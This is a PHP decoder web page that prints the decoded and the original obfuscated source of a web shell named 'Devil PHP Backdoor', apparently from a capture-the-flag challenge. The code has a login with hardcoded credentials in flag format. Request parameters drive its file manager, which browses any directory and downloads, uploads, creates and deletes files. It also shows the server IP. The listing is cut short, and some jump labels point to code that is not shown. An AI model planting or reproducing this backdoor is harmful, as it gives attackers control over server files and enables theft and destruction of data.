Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
- goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["..
Decoded Output download
<? - goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["chDir"])) { $dir = $_GET["chDir"]; } echo "<a href="?action=files&chDir=" . $dir . "&download=" . $file . ""/>[Download]</a>"; } goto BE4IO; w9cXK: function getFileMime($file) { return mime_content_type($file); } goto AtRPe; BsPcD: if (isset($_POST["login"]) && isset($_POST["pass"])) { if ($_POST["login"] == "NomanProdhan" && $_POST["pass"] == "BDSEC{_d3V1L_PHP_b4CKD00r_}") { $_SESSION["login"] = "logged"; } } goto p67iP; JkAp3: ob_start(); goto BISgL; BISgL: session_start(); goto BsPcD; tQtbl: if (isset($_GET["download"]) && !empty($_GET["download"]) && isset($_GET["chDir"])) { downloadFile($_GET["chDir"] . "/" . $_GET["download"]); } goto AjwiS; hoS3m: if (isset($_POST["folderName"]) && !empty($_POST["folderName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFolderFlag = createFolder($dir, $_POST["folderName"]); } goto tQxiS; iOdeB: function createFolder($path, $name) { if (is_dir($path . "/" . $name)) { return "Folder already exist."; } else { if (!is_writable($path)) { return "Don't have write permission."; } else { try { mkdir($path . "/" . $name, 511); return "Folder has been created."; } catch (Exception $e) { return "error."; } } } } goto nGUMD; nGUMD: function uploadFile($path, $file) { $targetFile = $path . "/" . basename($file["uploadFile"]["name"]); if (!is_writable($path)) { return "Don't have write permission."; } else { if (move_uploaded_file($file["uploadFile"]["tmp_name"], $targetFile)) { return "File has been uploaded."; } else { return "Couldn't upload file."; } } } goto w9cXK; xMIJW: function createFile($path, $name) { if (file_exists($path . "/" . $name)) { echo "File already exist."; } else { if (!is_writable($path)) { echo "Don't have write permission."; } else { try { $file = fopen($path . "/" . $name, "w"); fwrite($file, "test"); fclose($file); return "File has been created."; } catch (Exception $e) { return "error."; } } } } goto iOdeB; AjwiS: if (isset($_GET["delete"]) && !empty($_GET["delete"]) && isset($_GET["chDir"])) { if (unlink($_GET["chDir"] . "/" . $_GET["delete"])) { $deleteFileFlag = "File has been deleted."; } else { $deleteFileFlag = "Couldn't delete the file."; } } goto K5ZdW; bd2b3: ?>
-<!doctypehtml><html><head><title>Devil PHP Backdoor</title><style>::-webkit-scrollbar{width:10px}::-webkit-scrollbar-track{box-shadow:inset 0 0 5px grey;border-radius:5px}::-webkit-scrollbar-thumb{background:#24484a;border-radius:5px}::-webkit-scrollbar-thumb:hover{background:#0bdbca}*{margin:0;padding:0}body{background:#000;color:#0bdbca;max-width:1024px;margin:auto;font-family:'Courier New',Courier,monospace}.center{margin:0;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}input{width:auto;border:#0bdbca 2px solid;background:#000;color:#0bdbca;height:30px;width:200px;padding:10px;font-size:18px;font-family:'Courier New',Courier,monospace;outline:0}input:focus{border:#0bdbca 2px solid;background:#000;color:#0bdbca}button{background:#0bdbca;color:#000;outline:0;padding:10px;font-family:'Courier New',Courier,monospace;border:#0bdbca 2px solid;height:55px}.simple-nav{background:#000;border:#0bdbca 2px solid;height:40px;width:100%}.simple-nav-item{text-decoration:none;height:40px;border:#000 1px solid;background:#0bdbca;color:#000;padding:10px}.table-1{margin-top:20px;border:#0bdbca 2px solid;width:100%;max-width:1920px}td{padding:5px}pre{height:500px;width:1000px;text-align:left;overflow:scroll;font-size:13px}.main-wrapper{display:flex;align-items:center;justify-content:center;min-height:100vh;height:auto;padding:20px}.link-1{text-decoration:none;color:#0bdbca}.link-2{text-decoration:none;color:#fff}.fileManContent{width:994px;height:500px;overflow:scroll;margin:0;padding:0}.fileManContent thead th{position:sticky;top:0}a{text-decoration:none;color:#09947d}</style></head><body><div><?php goto x23Fx; K5ZdW: if (isset($_POST["fileName"]) && !empty($_POST["fileName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFileFlag = createFile($dir, $_POST["fileName"]); } goto hoS3m; x23Fx: if (!isset($_SESSION["login"])) { ?>
-<div class="center"><h1>Login to Devil PHP Backdoor</h1><br><form action="<?php echo $_SERVER["PHP_SELF"]; ?>
-"method="POST"><input name="login"placeholder="Login"> <input name="pass"placeholder="Pssword"type="password"> <button type="submit">Login</button></form><br><hr><br><?php echo "<h2>Server IP : " . $_SERVER["SERVER_ADDR"] . "</h2>"; ?>
Did this file decode correctly?
Original Code
- goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["\143\150\104\151\162"])) { $dir = $_GET["\143\150\x44\x69\x72"]; } echo "\74\x61\40\150\x72\x65\x66\x3d\42\x3f\141\143\x74\151\x6f\x6e\75\146\x69\154\145\163\x26\143\150\x44\151\162\75" . $dir . "\46\144\x6f\167\156\154\157\x61\144\x3d" . $file . "\42\57\76\133\x44\x6f\167\x6e\154\157\141\144\135\74\57\141\76"; } goto BE4IO; w9cXK: function getFileMime($file) { return mime_content_type($file); } goto AtRPe; BsPcD: if (isset($_POST["\x6c\x6f\x67\151\156"]) && isset($_POST["\x70\141\x73\163"])) { if ($_POST["\x6c\157\147\x69\156"] == "\x4e\x6f\x6d\x61\156\120\x72\x6f\144\150\x61\156" && $_POST["\x70\141\163\163"] == "\x42\x44\x53\x45\x43\x7b\x5f\x64\x33\x56\x31\x4c\x5f\x50\x48\x50\x5f\x62\x34\x43\x4b\x44\x30\x30\x72\x5f\x7d") { $_SESSION["\x6c\x6f\x67\151\x6e"] = "\x6c\x6f\x67\147\145\144"; } } goto p67iP; JkAp3: ob_start(); goto BISgL; BISgL: session_start(); goto BsPcD; tQtbl: if (isset($_GET["\144\157\167\x6e\154\157\x61\x64"]) && !empty($_GET["\144\157\167\x6e\x6c\157\x61\x64"]) && isset($_GET["\x63\150\x44\151\x72"])) { downloadFile($_GET["\143\150\x44\x69\162"] . "\x2f" . $_GET["\x64\157\x77\156\154\157\141\144"]); } goto AjwiS; hoS3m: if (isset($_POST["\x66\x6f\x6c\144\x65\162\x4e\x61\x6d\x65"]) && !empty($_POST["\x66\157\154\x64\x65\162\x4e\x61\155\x65"])) { $dir = getcwd(); if (isset($_GET["\x63\150\x44\151\162"]) && !empty($_GET["\143\x68\x44\151\162"])) { $dir = $_GET["\x63\150\104\151\162"]; } $createFolderFlag = createFolder($dir, $_POST["\x66\157\154\x64\145\x72\x4e\x61\155\145"]); } goto tQxiS; iOdeB: function createFolder($path, $name) { if (is_dir($path . "\57" . $name)) { return "\106\x6f\154\144\x65\x72\x20\x61\x6c\162\145\x61\144\171\x20\x65\x78\x69\x73\x74\56"; } else { if (!is_writable($path)) { return "\x44\x6f\x6e\47\164\x20\150\x61\x76\x65\x20\x77\x72\151\x74\x65\40\160\x65\162\155\x69\163\163\x69\157\156\x2e"; } else { try { mkdir($path . "\x2f" . $name, 511); return "\106\157\154\x64\x65\x72\x20\x68\x61\163\x20\x62\145\x65\x6e\x20\143\162\x65\141\164\145\144\x2e"; } catch (Exception $e) { return "\x65\162\162\x6f\x72\56"; } } } } goto nGUMD; nGUMD: function uploadFile($path, $file) { $targetFile = $path . "\x2f" . basename($file["\165\x70\x6c\157\141\144\x46\x69\154\145"]["\156\141\x6d\145"]); if (!is_writable($path)) { return "\104\x6f\156\47\164\x20\x68\141\x76\x65\x20\x77\x72\x69\164\x65\40\x70\x65\162\x6d\x69\163\x73\151\157\156\56"; } else { if (move_uploaded_file($file["\x75\160\154\157\x61\144\106\x69\154\x65"]["\x74\155\x70\137\x6e\141\x6d\x65"], $targetFile)) { return "\x46\151\154\145\40\x68\141\163\40\x62\145\145\156\x20\165\160\154\157\141\x64\x65\144\x2e"; } else { return "\103\157\165\154\x64\156\47\164\x20\165\160\x6c\x6f\x61\x64\40\146\x69\154\x65\56"; } } } goto w9cXK; xMIJW: function createFile($path, $name) { if (file_exists($path . "\57" . $name)) { echo "\106\151\154\x65\40\141\154\x72\145\141\x64\x79\x20\145\x78\151\163\x74\56"; } else { if (!is_writable($path)) { echo "\x44\x6f\156\47\164\x20\150\141\166\145\x20\167\x72\x69\164\x65\x20\x70\145\162\x6d\151\x73\163\151\x6f\156\56"; } else { try { $file = fopen($path . "\57" . $name, "\x77"); fwrite($file, "\164\145\x73\x74"); fclose($file); return "\106\x69\154\x65\x20\x68\x61\163\40\142\145\x65\156\x20\x63\162\145\141\x74\x65\144\56"; } catch (Exception $e) { return "\x65\162\162\157\162\x2e"; } } } } goto iOdeB; AjwiS: if (isset($_GET["\144\145\x6c\145\x74\145"]) && !empty($_GET["\144\145\154\x65\164\x65"]) && isset($_GET["\143\x68\104\151\x72"])) { if (unlink($_GET["\143\x68\x44\x69\x72"] . "\x2f" . $_GET["\x64\x65\154\x65\x74\x65"])) { $deleteFileFlag = "\x46\151\x6c\x65\40\x68\141\163\x20\x62\x65\145\156\x20\x64\x65\x6c\x65\164\x65\144\x2e"; } else { $deleteFileFlag = "\x43\157\x75\154\144\156\x27\164\40\x64\145\x6c\145\164\145\x20\x74\150\x65\40\x66\151\x6c\145\x2e"; } } goto K5ZdW; bd2b3: ?>
-<!doctypehtml><html><head><title>Devil PHP Backdoor</title><style>::-webkit-scrollbar{width:10px}::-webkit-scrollbar-track{box-shadow:inset 0 0 5px grey;border-radius:5px}::-webkit-scrollbar-thumb{background:#24484a;border-radius:5px}::-webkit-scrollbar-thumb:hover{background:#0bdbca}*{margin:0;padding:0}body{background:#000;color:#0bdbca;max-width:1024px;margin:auto;font-family:'Courier New',Courier,monospace}.center{margin:0;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}input{width:auto;border:#0bdbca 2px solid;background:#000;color:#0bdbca;height:30px;width:200px;padding:10px;font-size:18px;font-family:'Courier New',Courier,monospace;outline:0}input:focus{border:#0bdbca 2px solid;background:#000;color:#0bdbca}button{background:#0bdbca;color:#000;outline:0;padding:10px;font-family:'Courier New',Courier,monospace;border:#0bdbca 2px solid;height:55px}.simple-nav{background:#000;border:#0bdbca 2px solid;height:40px;width:100%}.simple-nav-item{text-decoration:none;height:40px;border:#000 1px solid;background:#0bdbca;color:#000;padding:10px}.table-1{margin-top:20px;border:#0bdbca 2px solid;width:100%;max-width:1920px}td{padding:5px}pre{height:500px;width:1000px;text-align:left;overflow:scroll;font-size:13px}.main-wrapper{display:flex;align-items:center;justify-content:center;min-height:100vh;height:auto;padding:20px}.link-1{text-decoration:none;color:#0bdbca}.link-2{text-decoration:none;color:#fff}.fileManContent{width:994px;height:500px;overflow:scroll;margin:0;padding:0}.fileManContent thead th{position:sticky;top:0}a{text-decoration:none;color:#09947d}</style></head><body><div><?php goto x23Fx; K5ZdW: if (isset($_POST["\146\151\154\x65\x4e\141\155\x65"]) && !empty($_POST["\x66\x69\154\145\x4e\x61\155\145"])) { $dir = getcwd(); if (isset($_GET["\x63\150\x44\x69\x72"]) && !empty($_GET["\x63\150\x44\x69\162"])) { $dir = $_GET["\x63\150\104\x69\162"]; } $createFileFlag = createFile($dir, $_POST["\x66\x69\x6c\x65\x4e\x61\x6d\145"]); } goto hoS3m; x23Fx: if (!isset($_SESSION["\154\157\x67\x69\156"])) { ?>
-<div class="center"><h1>Login to Devil PHP Backdoor</h1><br><form action="<?php echo $_SERVER["\x50\x48\120\x5f\x53\x45\x4c\106"]; ?>
-"method="POST"><input name="login"placeholder="Login"> <input name="pass"placeholder="Pssword"type="password"> <button type="submit">Login</button></form><br><hr><br><?php echo "\74\150\x32\x3e\x53\x65\162\x76\145\162\40\x49\120\40\72\x20" . $_SERVER["\x53\x45\x52\126\105\122\x5f\x41\x44\x44\122"] . "\74\x2f\150\x32\76"; ?>
Function Calls
None |
Stats
MD5 | 99f1dce3a414296b0663e1b3febd1e43 |
Eval Count | 0 |
Decode Time | 115 ms |